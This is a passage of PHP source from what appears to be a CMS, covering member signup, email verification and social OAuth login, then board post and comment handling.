$check->idx)->execute(); $this->login($check->idx); $results->success = true; } elseif ($check->status == 'VERIFYING') { $_SESSION['MEMBER_REGISTER_IDX'] = Encoder($check->idx); $page = $this->getMemberPage('signup'); $results->success = false; $results->redirect = $this->IM->getUrl($page->menu, $page->page, 'verify'); } else { $results->success = false; $results->message = $this->getLanguage('error/' . $check->status); } } } $_SESSION['loginFail'] = $loginFail; } if ($action == 'logout') { unset($_SESSION['MEMBER_LOGGED']); $results->success = true; } if ($action == 'cert') { $results->success = true; } if ($action == 'signup') { $siteType = $this->IM->getSites($this->IM->domain)->member; $errors = array(); $email = CheckEmail(Request('email')) == true ? Request('email') : ($errors['email'] = $this->getLanguage('signup/help/email/error')); $password = strlen(Request('password')) >= 4 ? Request('password') : ($errors['password'] = $this->getLanguage('signup/help/password/error')); if (strlen(Request('password')) < 4 || Request('password') != Request('password_confirm')) { $errors['password_confirm'] = $this->getLanguage('signup/help/password_confirm/error'); } $name = CheckNickname(Request('name')) == true ? Request('name') : ($errors['name'] = $this->getLanguage('signup/help/name/error')); $nickname = CheckNickname(Request('nickname')) == true ? Request('nickname') : ($errors['nickname'] = $this->getLanguage('signup/help/nickname/error')); if ($this->db()->select($this->table->member)->where('email', $email)->where('domain', $siteType == 'MERGE' ? '*' : $this->IM->domain)->has() == true || $this->db()->select($this->table->member)->where('email', $email)->where('type', 'ADMINISTRATOR')->has() == true) { $errors['email'] = $this->getLanguage('signup/help/email/duplicated'); } if ($this->db()->select($this->table->member)->where('nickname', $nickname)->where('domain', $siteType == 'MERGE' ? '*' : $this->IM->domain)->has() == true || $this->db()->select($this->table->member)->where('nickname', $nickname)->where('type', 'ADMINISTRATOR')->has() == true) { $errors['nickname'] = $this->getLanguage('signup/help/nickname/duplicated'); } if (empty($errors) == true) { $mHash = new Hash(); $insert = array(); $insert['email'] = $email; $insert['domain'] = $siteType == 'MERGE' ? '*' : $this->IM->domain; $insert['password'] = $mHash->password_hash($password); $insert['name'] = $name; $insert['nickname'] = $nickname; $insert['status'] = 'VERIFYING'; $insert['reg_date'] = time(); $idx = $this->db()->insert($this->table->member, $insert)->execute(); if ($idx !== false) { $results->success = true; $_SESSION['MEMBER_REGISTER_IDX'] = Encoder($idx); $this->sendVerifyEmail($idx); unset($_SESSION['registerGIDX']); } else { $results->success = false; } } else { $results->success = false; $results->errors = $errors; } } if ($action == 'verifyEmail') { $registerIDX = Request('registerIDX'); if ($registerIDX == null) { $results->success = false; } else { $email = Request('email'); $email_verify_code = Request('email_verify_code'); $check = $this->db()->select($this->table->email)->where('midx', $registerIDX)->where('email', $email)->getOne(); if ($check == null) { $results->success = false; $results->errors = array('email' => $this->getLanguage('verifyEmail/help/email/notFound')); } elseif ($check->code == $email_verify_code) { $this->db()->update($this->table->email, array('status' => 'VERIFIED'))->where('midx', $registerIDX)->where('email', $email)->execute(); $this->db()->update($this->table->member, array('status' => 'ACTIVE'))->where('idx', $registerIDX)->execute(); $results->success = true; } else { $results->success = false; $results->errors = array('email_verify_code' => $this->getLanguage('verifyEmail/help/email_verify_code/error')); } } } if ($action == 'sendVerifyEmail') { $registerIDX = Request('registerIDX'); $email = Request('email'); if ($this->isLogged() == true) { if (CheckEmail($email) == false) { $results->success = false; $results->errors = array('email' => $this->getLanguage('modifyEmail/help/email/error')); } elseif ($this->db()->select($this->table->member)->where('email', $email)->count() == 1) { $results->success = false; $results->errors = array('email' => $this->getLanguage('modifyEmail/help/email/duplicated')); } else { $check = $this->db()->select($this->table->email)->where('midx', $this->getLogged())->where('email', $email)->getOne(); if ($check == null || $check->status != 'SENDING' || $check->status == 'SENDING' && $check->reg_date + 300 < time()) { $this->db()->delete($this->table->email)->where('midx', $this->getLogged())->where('email', $email)->execute(); $status = $this->sendVerifyEmail($this->getLogged(), $email); $results->success = true; $results->message = $this->getLanguage('verifyEmail/sending'); } else { $results->success = false; $results->message = $this->getLanguage('verifyEmail/error/sending'); } } } elseif ($registerIDX != null) { $member = $this->db()->select($this->table->member)->where('idx', $registerIDX)->getOne(); if ($member == null || $member->status != 'VERIFYING') { $results->success = false; $results->message = $this->getLanguage('verifyEmail/error/target'); } else { if (CheckEmail($email) == false) { $results->success = false; $results->message = $this->getLanguage('verifyEmail/error/email'); } else { $check = $this->db()->select($this->table->email)->where('midx', $registerIDX)->where('email', $email)->getOne(); if ($check->status == 'VERIFIED') { $signupPage = $this->getMemberPage('signup'); $results->success = true; $this->db()->update($this->table->member, array('status' => 'ACTIVE'))->where('idx', $registerIDX)->execute(); $results->redirect = $this->IM->getUrl($signupPage->menu, $signupPage->page, 'complete'); } elseif ($check == null || $check->status == 'CANCELED' || $check->status == 'SENDING' && $check->reg_date + 300 < time()) { $this->db()->delete($this->table->email)->where('midx', $registerIDX)->where('email', $email)->execute(); $status = $this->sendVerifyEmail($registerIDX, $email); $results->success = true; $results->message = $this->getLanguage('verifyEmail/sending'); } else { $results->success = false; $results->message = $this->getLanguage('verifyEmail/error/sending'); } } } } else { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } } if ($action == 'photoEdit') { $templet = Request('templet'); if ($this->isLogged() == true) { $results->success = true; $results->modalHtml = $this->getPhotoEdit($templet); $results->photo = $this->getMember()->photo; } else { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } } if ($action == 'photoUpload') { $photo = Request('photo'); if ($this->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } else { if (preg_match('/^data:image\\/(.*?);base64,(.*?)$/', $photo, $match) == true) { $bytes = base64_decode($match[2]); file_put_contents($this->IM->getAttachmentPath() . '/member/' . $this->getLogged() . '.jpg', $bytes); $this->IM->getModule('attachment')->createThumbnail($this->IM->getAttachmentPath() . '/member/' . $this->getLogged() . '.jpg', $this->IM->getAttachmentPath() . '/member/' . $this->getLogged() . '.jpg', 250, 250, false, 'jpg'); $results->success = true; $results->message = $this->getLanguage('photoEdit/success'); } else { $results->success = false; $results->message = $this->getLanguage('photoEdit/error'); } } } if ($action == 'modifyEmail') { $confirm = Request('confirm'); if ($confirm == 'TRUE') { $email = Request('email'); $code = Request('code'); $check = $this->db()->select($this->table->email)->where('midx', $this->getLogged())->where('email', $email)->getOne(); if ($check == null || $check->code != $code) { $results->success = false; $results->errors = array('code' => $this->getLanguage('modifyEmail/help/code/error')); } else { $this->db()->update($this->table->email, array('status' => 'VERIFIED'))->where('midx', $this->getLogged())->where('email', $email)->execute(); $this->db()->update($this->table->member, array('email' => $email))->where('idx', $this->getLogged())->execute(); $results->success = true; $results->message = $this->getLanguage('modifyEmail/success'); } } else { $templet = Request('templet'); if ($this->isLogged() == true) { $results->success = true; $results->modalHtml = $this->getModifyEmail($templet); } else { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } } } if ($action == 'modify') { $step = Request('step'); if ($step == 'verify') { $member = $this->getMember(); $password = Request('password'); $mHash = new Hash(); if ($mHash->password_validate($password, $member->password) == true) { $results->success = true; $results->password = Encoder($password); } else { $results->success = false; $results->errors = array('password' => $this->getLanguage('verify/help/password/error')); } } if ($step == 'modify') { $errors = array(); $values->name = Request('name') ? Request('name') : ($errors['name'] = $this->getLanguage('signup/help/name/error')); $values->nickname = Request('nickname') ? Request('nickname') : ($errors['nickname'] = $this->getLanguage('signup/help/nickname/error')); if ($this->isLogged() == false) { $results->success = false; $results->message = $this->getLangauge('error/notLogged'); } elseif (count($errors) == 0) { $insert = array(); $insert['name'] = $values->name; $insert['nickname'] = $values->nickname; $this->db()->update($this->table->member, $insert)->where('idx', $this->getLogged())->execute(); $results->success = true; $results->message = $this->getLanguage('modify/success'); } else { $results->success = false; $results->errors = $errors; } } } if ($action == 'password') { $errors = array(); $password = strlen(Request('password')) >= 4 ? Request('password') : ($errors['password'] = $this->getLanguage('signup/help/password/error')); if (strlen(Request('password')) < 4 || Request('password') != Request('password_confirm')) { $errors['password_confirm'] = $this->getLanguage('signup/help/password_confirm/error'); } if ($this->isLogged() == false) { $results->success = false; $results->message = $this->getLangauge('error/notLogged'); } else { $mHash = new Hash(); if (strlen($this->getMember()->password) == 65) { $old_password = Request('old_password'); if ($old_password == '' || $mHash->password_validate($old_password, $this->getMember()->password) == false) { $errors['old_password'] = $this->getLanguage('password/help/old_password/error'); } } if (count($errors) == 0) { $password = $mHash->password_hash($password); $this->db()->update($this->table->member, array('password' => $password))->where('idx', $this->getLogged())->execute(); $results->success = true; $results->message = $this->getLanguage('password/success'); } else { $results->success = false; $results->errors = $errors; } } } if ($action == 'facebook') { $OAUTH = $this->db()->select($this->table->social_oauth)->where('domain', $this->IM->domain)->where('code', $action)->getOne(); if ($OAUTH == null) { $this->IM->printError('OAUTH_DOMAIN_ERROR'); } $CLIENT_ID = $OAUTH->client_id; $CLIENT_SECRET = $OAUTH->client_secret; $AUTH_URL = 'https://graph.facebook.com/oauth/authorize'; $TOKEN_URL = 'https://graph.facebook.com/oauth/access_token'; if (Request('SOCIAL_REDIRECT_URL', 'session') == null) { $_SESSION['SOCIAL_REDIRECT_URL'] = $_SERVER['HTTP_REFERER']; } $facebook = new OAuthClient(); $facebook->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setScope('public_profile,email')->setAccessType('offline')->setAuthUrl($AUTH_URL)->setTokenUrl($TOKEN_URL); if (isset($_GET['code']) == true) { if ($facebook->authenticate($_GET['code']) == true) { $redirectUrl = $facebook->getRedirectUrl(); header('location:' . $redirectUrl); } exit; } elseif ($facebook->getAccessToken() == null) { $authUrl = $facebook->getAuthenticationUrl(); header('location:' . $authUrl); exit; } $data = $facebook->get('https://graph.facebook.com/me', array('fields' => 'id,email,name')); if ($data === false || empty($data->email) == true) { $this->IM->printError('OAUTH_API_ERROR'); } $accessToken = $facebook->getAccessToken(); $refreshToken = $facebook->getRefreshToken() == null ? '' : $facebook->getRefreshToken(); $this->socialLogin('facebook', $data->id, $data->name, $data->email, 'https://graph.facebook.com/' . $data->id . '/picture?width=250&height=250', $accessToken, $refreshToken); } if ($action == 'google') { $OAUTH = $this->db()->select($this->table->social_oauth)->where('domain', $this->IM->domain)->where('code', $action)->getOne(); if ($OAUTH == null) { $this->IM->printError('OAUTH_DOMAIN_ERROR'); } $CLIENT_ID = $OAUTH->client_id; $CLIENT_SECRET = $OAUTH->client_secret; $AUTH_URL = 'https://accounts.google.com/o/oauth2/auth'; $TOKEN_URL = 'https://accounts.google.com/o/oauth2/token'; if (Request('SOCIAL_REDIRECT_URL', 'session') == null) { $_SESSION['SOCIAL_REDIRECT_URL'] = $_SERVER['HTTP_REFERER']; } $google = new OAuthClient(); $google->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setScope('https://www.googleapis.com/auth/plus.me https://www.googleapis.com/auth/userinfo.email')->setAccessType('offline')->setAuthUrl($AUTH_URL)->setTokenUrl($TOKEN_URL); if (isset($_GET['code']) == true) { if ($google->authenticate($_GET['code']) == true) { $redirectUrl = $google->getRedirectUrl(); header('location:' . $redirectUrl); } exit; } elseif ($google->getAccessToken() == null) { $authUrl = $google->getAuthenticationUrl(); header('location:' . $authUrl); exit; } $data = $google->get('https://www.googleapis.com/plus/v1/people/me'); if ($data === false || empty($data->emails) == true) { $this->IM->printError('OAUTH_API_ERROR'); } for ($i = 0, $loop = count($data->emails); $i < $loop; $i++) { if ($data->emails[$i]->type == 'account') { $data->email = $data->emails[$i]->value; break; } } $data->photo = str_replace('sz=50', 'sz=250', $data->image->url); $accessToken = $google->getAccessToken(); $refreshToken = $google->getRefreshToken() == null ? '' : $google->getRefreshToken(); $this->socialLogin('google', $data->id, $data->displayName, $data->email, $data->photo, $accessToken, $refreshToken); } if ($action == 'youtube') { $OAUTH = $this->db()->select($this->table->social_oauth)->where('domain', $this->IM->domain)->where('code', $action)->getOne(); if ($OAUTH == null) { $this->IM->printError('OAUTH_DOMAIN_ERROR'); } $CLIENT_ID = $OAUTH->client_id; $CLIENT_SECRET = $OAUTH->client_secret; $AUTH_URL = 'https://accounts.google.com/o/oauth2/auth'; $TOKEN_URL = 'https://accounts.google.com/o/oauth2/token'; if (Request('SOCIAL_REDIRECT_URL', 'session') == null) { $_SESSION['SOCIAL_REDIRECT_URL'] = $_SERVER['HTTP_REFERER']; } if ($this->isLogged() == false) { die($this->getError('NOT_LOGGED')); } $youtube = new OAuthClient(); $youtube->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setScope('https://www.googleapis.com/auth/plus.me https://www.googleapis.com/auth/userinfo.email https://www.googleapis.com/auth/youtube https://www.googleapis.com/auth/youtube.upload https://www.googleapis.com/auth/youtubepartner https://www.googleapis.com/auth/youtube.force-ssl')->setAccessType('offline')->setAuthUrl($AUTH_URL)->setTokenUrl($TOKEN_URL); if (isset($_GET['code']) == true) { if ($youtube->authenticate($_GET['code']) == true) { $redirectUrl = $youtube->getRedirectUrl(); header('location:' . $redirectUrl); } exit; } elseif ($youtube->getAccessToken() == null) { $authUrl = $youtube->getAuthenticationUrl(); header('location:' . $authUrl); exit; } $data = $youtube->get('https://www.googleapis.com/plus/v1/people/me'); if ($data === false || empty($data->emails) == true) { $this->IM->printError('OAUTH_API_ERROR'); } for ($i = 0, $loop = count($data->emails); $i < $loop; $i++) { if ($data->emails[$i]->type == 'account') { $data->email = $data->emails[$i]->value; break; } } $accessToken = $youtube->getAccessToken(); $refreshToken = $youtube->getRefreshToken() == null ? '' : $youtube->getRefreshToken(); $check = $this->db()->select($this->table->social_token)->where('midx', $this->getLogged())->where('code', 'youtube')->getOne(); if ($check == null) { $this->db()->insert($this->table->social_token, array('midx' => $this->getLogged(), 'code' => 'youtube', 'user_id' => $data->id, 'email' => $data->email, 'access_token' => $accessToken, 'refresh_token' => $refreshToken))->execute(); } else { $this->db()->update($this->table->social_token, array('user_id' => $data->id, 'email' => $data->email, 'access_token' => $accessToken, 'refresh_token' => $refreshToken))->where('midx', $this->getLogged())->where('code', 'youtube')->execute(); } unset($_SESSION['OAUTH_ACCESS_TOKEN']); unset($_SESSION['OAUTH_REFRESH_TOKEN']); $redirectUrl = Request('SOCIAL_REDIRECT_URL', 'session') != null ? Request('SOCIAL_REDIRECT_URL', 'session') : '/'; unset($_SESSION['SOCIAL_REDIRECT_URL']); header('location:' . $redirectUrl); } if ($action == 'github') { $OAUTH = $this->db()->select($this->table->social_oauth)->where('domain', $this->IM->domain)->where('code', $action)->getOne(); if ($OAUTH == null) { $this->IM->printError('OAUTH_DOMAIN_ERROR'); } $CLIENT_ID = $OAUTH->client_id; $CLIENT_SECRET = $OAUTH->client_secret; $AUTH_URL = 'https://github.com/login/oauth/authorize'; $TOKEN_URL = 'https://github.com/login/oauth/access_token'; if (Request('SOCIAL_REDIRECT_URL', 'session') == null) { $_SESSION['SOCIAL_REDIRECT_URL'] = $_SERVER['HTTP_REFERER']; } $github = new OAuthClient(); $github->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setAuthUrl($AUTH_URL)->setScope('user')->setAccessType('offline')->setUserAgent('Awesome-Octocat-App')->setTokenUrl($TOKEN_URL); if (isset($_GET['code']) == true) { if ($github->authenticate($_GET['code']) == true) { $redirectUrl = $github->getRedirectUrl(); header('location:' . $redirectUrl); } exit; } elseif ($github->getAccessToken() == null) { $authUrl = $github->getAuthenticationUrl(); header('location:' . $authUrl); exit; } $data = $github->get('https://api.github.com/user'); if ($data === false || empty($data->email) == true) { $this->IM->printError('OAUTH_API_ERROR'); } $accessToken = $github->getAccessToken(); $refreshToken = $github->getRefreshToken() == null ? '' : $github->getRefreshToken(); $this->socialLogin('github', $data->id, $data->name, $data->email, $data->avatar_url, $accessToken, $refreshToken); } $this->IM->fireEvent('afterDoProcess', 'member', $action, $values, $results); return $results; }
function doProcess($action) { $results = new stdClass(); $values = new stdClass(); if ($action == 'listUrl') { $menu = Request('menu'); $page = Request('page'); $page = $this->IM->getPages($menu, $page); $oKey = Request('oKey'); $oKeyword = Request('oKeyword'); $oCategory = Request('oCategory'); $oSort = Request('oSort'); $oDirection = Request('oDirection'); $key = Request('key'); $keyword = Request('keyword'); $category = Request('category'); $sort = Request('sort'); $direction = Request('direction'); $key = Request('key'); $keyword = Request('keyword'); $p = Request('p') ? Request('p') : 1; $queryString = 'menu=' . $page->menu . '&page=' . $page->page . '&key=' . $key . '&keyword=' . $keyword . '&category=' . $category . '&sort=' . $sort . '&direction=' . $direction . '&p=' . $p; if ($oKey != $key || $oKeyword != $keyword || $oCategory != $category || $oSort != $sort || $oDirection != $direction) { $p = 1; } $default = array(); if (strlen($keyword) == 0) { $default['key'] = ''; $default['keyword'] = ''; } if ($sort == 'idx' && $direction == 'desc') { $default['sort'] = $default['direction'] = ''; } if (isset($page->context->config->category) == true && $page->context->config->category == $category) { $default['category'] = ''; } $url = $this->IM->getUrl($page->menu, $page->page, 'list', $p) . $this->IM->getQueryString($default, $queryString); $results->success = true; $results->url = $url; } if ($action == 'postWrite') { $values->errors = array(); $values->idx = Request('idx'); $values->bid = Request('bid'); $values->menu = Request('menu'); $values->page = Request('page'); $values->category = Request('category'); $values->title = Request('title') ? Request('title') : ($values->errors['title'] = $this->getLanguage('postWrite/help/title/error')); $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('postWrite/help/content/error')); $values->is_notice = Request('is_notice') && $this->checkPermission('notice') == true ? 'TRUE' : 'FALSE'; $values->is_html_title = Request('is_html_title') && $this->checkPermission('html_title') == true ? 'TRUE' : 'FALSE'; $values->is_secret = Request('is_secret') ? 'TRUE' : 'FALSE'; $values->is_hidename = Request('is_hidename') && $this->getModule('member')->isLogged() == true ? 'TRUE' : 'FALSE'; if ($this->IM->getModule('member')->isLogged() == false) { $values->name = Request('name') ? Request('name') : ($values->errors['name'] = $this->getLanguage('postWrite/help/name/error')); $values->password = Request('password') ? Request('password') : ($values->errors['password'] = $this->getLanguage('postWrite/help/password/error')); $values->email = Request('email'); $values->midx = 0; } else { $values->name = $this->IM->getModule('member')->getMember()->nickname; $values->password = ''; $values->email = $this->IM->getModule('member')->getMember()->email; $values->midx = $this->IM->getModule('member')->getLogged(); } $values->attachments = is_array(Request('attachments')) == true ? Request('attachments') : array(); for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { $values->attachments[$i] = Decoder($values->attachments[$i]); } $values->content = $this->encodeContent($values->content, $values->attachments); $values->board = $this->getBoard($values->bid); if ($values->board->use_category != 'NONE') { if ($values->board->use_category == 'FORCE' && ($values->category == null || preg_match('/^[1-9]+[0-9]*$/', $values->category) == false)) { $values->errors['category'] = $this->getLanguage('postWrite/help/category/error'); } } else { $values->category = 0; } if (empty($values->errors) == true) { $results->success = true; $mHash = new Hash(); $insert = array(); $insert['bid'] = $values->bid; $insert['category'] = $values->category; $insert['title'] = $values->title; $insert['content'] = $values->content; $insert['search'] = GetString($values->content, 'index'); $insert['is_notice'] = $values->is_notice; $insert['is_html_title'] = $values->is_html_title; $insert['is_secret'] = $values->is_secret; $insert['is_hidename'] = $values->is_hidename; if ($values->idx == null) { $post = null; $insert['midx'] = $values->midx; $insert['password'] = $values->password; $insert['name'] = $values->name; $insert['password'] = $values->password ? $mHash->password_hash($values->password) : ''; $insert['email'] = $values->email; $insert['reg_date'] = $insert['last_ment'] = time(); $insert['ip'] = $_SERVER['REMOTE_ADDR']; $values->idx = $this->db()->insert($this->table->post, $insert)->execute(); if ($this->IM->getModule('member')->isLogged() == true) { $this->IM->getModule('member')->sendPoint(null, $values->board->post_point, 'board', 'post', array('idx' => $values->idx)); $this->IM->getModule('member')->addActivity(null, $values->board->post_exp, 'board', 'post', array('idx' => $values->idx)); } } else { $post = $this->getPost($values->idx); if ($this->checkPermission('post_modify') == false) { if ($post->midx != 0 && $post->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif ($post->midx == 0) { if ($mHash->password_validate($values->password, $post->password) == false) { $results->success = false; $results->errors = array('password' => $this->getLanguage('error/incorrectPassword')); $results->message = $this->getLanguage('error/incorrectPassword'); } } } if ($results->success == true) { if ($post->midx == 0 && $this->IM->getModule('member')->isLogged() == false) { $insert['name'] = $values->name; $insert['password'] = $values->password ? $mHash->password_hash($values->password) : ''; $insert['email'] = $values->email; $insert['ip'] = $_SERVER['REMOTE_ADDR']; } $this->db()->update($this->table->post, $insert)->where('idx', $post->idx)->execute(); if ($post->midx != 0 && $post->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($post->midx, 'board', 'post_modify', $post->idx, array('from' => $values->name)); } if ($this->IM->getModule('member')->isLogged() == true) { $this->IM->getModule('member')->addActivity(null, 0, 'board', 'post_modify', array('idx' => $values->idx)); } } } if ($results->success == true) { for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) { $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'bid' => $values->bid, 'type' => 'POST', 'parent' => $values->idx))->execute(); } } if ($post != null && $post->category != $values->category) { $lastPost = $this->db()->select($this->table->post)->where('category', $post->category)->orderBy('reg_date', 'desc')->get(); $postnum = count($lastPost); $lastPostTime = $postnum > 0 ? $lastPost[0]->reg_date : 0; $this->db()->update($this->table->category, array('postnum' => $postnum, 'last_post' => $lastPostTime))->where('idx', $post->category)->execute(); } if ($values->category != 0 && ($post == null || $post->category != $values->category)) { $lastPost = $this->db()->select($this->table->post)->where('category', $values->category)->orderBy('reg_date', 'desc')->get(); $postnum = count($lastPost); $lastPostTime = $postnum > 0 ? $lastPost[0]->reg_date : 0; $this->db()->update($this->table->category, array('postnum' => $postnum, 'last_post' => $lastPostTime))->where('idx', $values->category)->execute(); } $lastPost = $this->db()->select($this->table->post)->where('bid', $values->bid)->orderBy('reg_date', 'desc')->get(); $postnum = count($lastPost); $lastPostTime = $postnum > 0 ? $lastPost[0]->reg_date : 0; $this->db()->update($this->table->board, array('postnum' => $postnum, 'last_post' => $lastPostTime))->where('bid', $values->bid)->execute(); $this->IM->setArticle('board', $values->bid, 'post', $values->idx, time()); $page = $this->IM->getPages($values->menu, $values->page); if ($page->context->config == null) { $results->redirect = $this->IM->getUrl($values->menu, $values->page, 'view', $values->idx); } elseif ($page->context->config->category == $values->category) { $results->redirect = $this->IM->getUrl($values->menu, $values->page, 'view', $values->idx); } else { $redirectPage = $this->getPostPage($values->idx); $results->redirect = $this->IM->getUrl($redirectPage->menu, $redirectPage->page, 'view', $values->idx); } } } else { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'postModify') { $values->idx = Request('idx'); $values->password = Request('password'); $post = $this->getPost($values->idx); if ($post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('post_modify') == true || $post->midx != 0 && $post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->permission = true; } elseif ($post->midx == 0) { if ($values->password === null) { $results->success = true; $results->permission = false; $results->modalHtml = $this->getModify('post', $values->idx); } else { $mHash = new Hash(); if ($mHash->password_validate($values->password, $post->password) == true) { $results->success = true; $results->permission = true; } else { $results->success = false; $results->errors = array('password' => $this->getLanguage('error/incorrectPassword')); } } } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'postDelete') { $values->idx = Request('idx'); $post = $this->getPost($values->idx); if ($post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('post_delete') == true || $post->midx == 0 || $post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->modalHtml = $this->getDelete('post', $values->idx); } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'mentModify') { $values->idx = Request('idx'); $values->password = Request('password'); $ment = $this->getMent($values->idx); $results->permission = false; if ($ment == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_modify') == true || $ment->midx != 0 && $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->permission = true; } elseif ($ment->midx == 0) { if ($values->password === null) { $results->success = true; $results->permission = false; $results->modalHtml = $this->getModify('ment', $values->idx); } else { $mHash = new Hash(); if ($mHash->password_validate($values->password, $ment->password) == true) { $results->success = true; $results->permission = true; } else { $results->success = false; $results->errors = array('password' => $this->getLanguage('error/incorrectPassword')); } } } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->permission == true) { $ment->content = $this->getArticleContent($ment->content); $attachments = $this->db()->select($this->table->attachment)->where('parent', $ment->idx)->where('type', 'MENT')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $ment->attachment = Encoder(json_encode($attachments)); $results->data = $ment; } } if ($action == 'getMent') { $values->get = Request('get'); if ($values->get == 'page') { $values->parent = Request('parent'); $values->post = $this->getPost($values->parent); $values->board = $this->getBoard($values->post->bid); $values->mentlimit = $values->board->mentlimit; $values->page = Request('page'); $values->ments = $this->getMentPage($values->parent, $values->page, $values->mentlimit); if ($values->page > 1 && count($values->ments) == 0) { while ($values->page > 1) { $values->page = $values->page - 1; $values->ments = $this->getMentPage($values->parent, $values->page, $values->mentlimit); if (count($values->ments) > 0) { break; } } } if (count($values->ments) == 0) { $results->page = null; $results->mentHtml = '<div class="empty">' . $this->getLanguage('mentList/empty') . '</div>'; } else { $results->page = $values->page; } } elseif ($values->get == 'idx') { $values->idx = Request('idx'); $ment = $this->getMent($values->idx); $values->parent = $ment->parent; if ($ment != null) { $values->page = $this->getMentPosition($values->idx); $values->post = $this->getPost($values->parent); $values->board = $this->getBoard($values->post->bid); $values->mentlimit = $values->board->mentlimit; $values->ments = $this->getMentPage($values->parent, $values->page, $values->mentlimit); $results->page = $values->page; } else { $results->page = null; $results->mentHtml = '<div class="empty">' . $this->getLanguage('mentList/empty') . '</div>'; } } $results->success = true; $results->parent = $values->parent; $results->mentCount = number_format($values->post->ment); $results->idxs = array(); $results->ments = array(); if (empty($values->mentHtml) == false) { $results->mentHtml = $values->mentHtml; } if ($results->page !== null) { for ($i = 0, $loop = count($values->ments); $i < $loop; $i++) { $results->ments[$i] = array('idx' => $values->ments[$i]->idx, 'modify_date' => $values->ments[$i]->modify_date, 'html' => $this->getMentItem($values->ments[$i])); $results->idxs[$i] = $values->ments[$i]->idx; } } $results->pagination = $this->getMentPagination($results->parent, $results->page); } if ($action == 'getMentDepth') { $idx = Request('idx'); $parent = $this->getMent($idx); if ($parent == null || $parent->is_delete == 'TRUE') { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($parent->depth >= 10) { $results->success = false; $results->message = $this->getLanguage('mentWrite/overdepth'); } else { $results->success = true; $results->depth = $parent->depth; $results->parent = $parent->parent; $results->source = $idx; } } if ($action == 'mentWrite') { $values->errors = array(); $values->idx = Request('idx'); $values->source = Request('source'); $values->parent = Request('parent'); $values->post = $this->getPost($values->parent); $values->board = $this->getBoard($values->post->bid); $values->is_secret = Request('is_secret') ? 'TRUE' : 'FALSE'; $values->is_hidename = Request('is_hidename') && $this->IM->getModule('member')->isLogged() == true ? 'TRUE' : 'FALSE'; $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('postWrite/help/content/error')); if ($this->IM->getModule('member')->isLogged() == false) { $values->name = Request('name') ? Request('name') : ($values->errors['name'] = $this->getLanguage('postWrite/help/name/error')); $values->password = Request('password') ? Request('password') : ($values->errors['password'] = $this->getLanguage('postWrite/help/password/error')); $values->email = Request('email'); $values->midx = 0; } else { $values->name = $this->IM->getModule('member')->getMember()->nickname; $values->password = ''; $values->email = $this->IM->getModule('member')->getMember()->email; $values->midx = $this->IM->getModule('member')->getLogged(); } $values->attachments = is_array(Request('attachments')) == true ? Request('attachments') : array(); for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { $values->attachments[$i] = Decoder($values->attachments[$i]); } $results->success = true; if ($values->source) { $sourceData = $this->getMent($values->source); if ($sourceData == null) { $results->success = false; $results->message = $this->getLanguage('mentWrite/deleteSource'); } } $values->content = $this->encodeContent($values->content, $values->attachments); if ($results->success == true && empty($values->errors) == true) { $mHash = new Hash(); $insert = array(); $insert['bid'] = $values->post->bid; $insert['parent'] = $values->parent; $insert['content'] = $values->content; $insert['search'] = GetString($values->content, 'index'); $insert['is_secret'] = $values->is_secret; $insert['is_hidename'] = $values->is_hidename; if ($values->idx == null) { $insert['midx'] = $values->midx; $insert['password'] = $values->password; $insert['name'] = $values->name; $insert['password'] = $values->password ? $mHash->password_hash($values->password) : ''; $insert['email'] = $values->email; $insert['reg_date'] = time(); $insert['ip'] = $_SERVER['REMOTE_ADDR']; $values->idx = $this->db()->insert($this->table->ment, $insert)->execute(); if ($values->source) { $sourceData = $this->getMent($values->source); $head = $sourceData->head; $depth = $sourceData->depth + 1; $source = $sourceData->idx; if ($depth > 1) { $depthData = $this->db()->select($this->table->ment_depth)->where('head', $sourceData->head)->where('arrange', $sourceData->arrange, '>')->where('depth', $sourceData->depth, '<=')->orderBy('arrange', 'asc')->getOne(); if ($depthData == null) { $arrange = $values->idx; } else { $arrange = $depthData->arrange; $this->db()->update($this->table->ment_depth, array('arrange' => $this->db()->inc()))->where('head', $sourceData->head)->where('arrange', $arrange, '>=')->execute(); } } else { $arrange = $values->idx; } } else { $head = $values->idx; $arrange = $values->idx; $depth = 0; $source = 0; } $this->db()->insert($this->table->ment_depth, array('idx' => $values->idx, 'parent' => $values->parent, 'head' => $head, 'arrange' => $arrange, 'depth' => $depth, 'source' => $source))->execute(); if ($this->IM->getModule('member')->isLogged() == true) { $this->IM->getModule('member')->sendPoint(null, $values->board->ment_point, 'board', 'ment', array('idx' => $values->idx)); $this->IM->getModule('member')->addActivity(null, $values->board->ment_exp, 'board', 'ment', array('idx' => 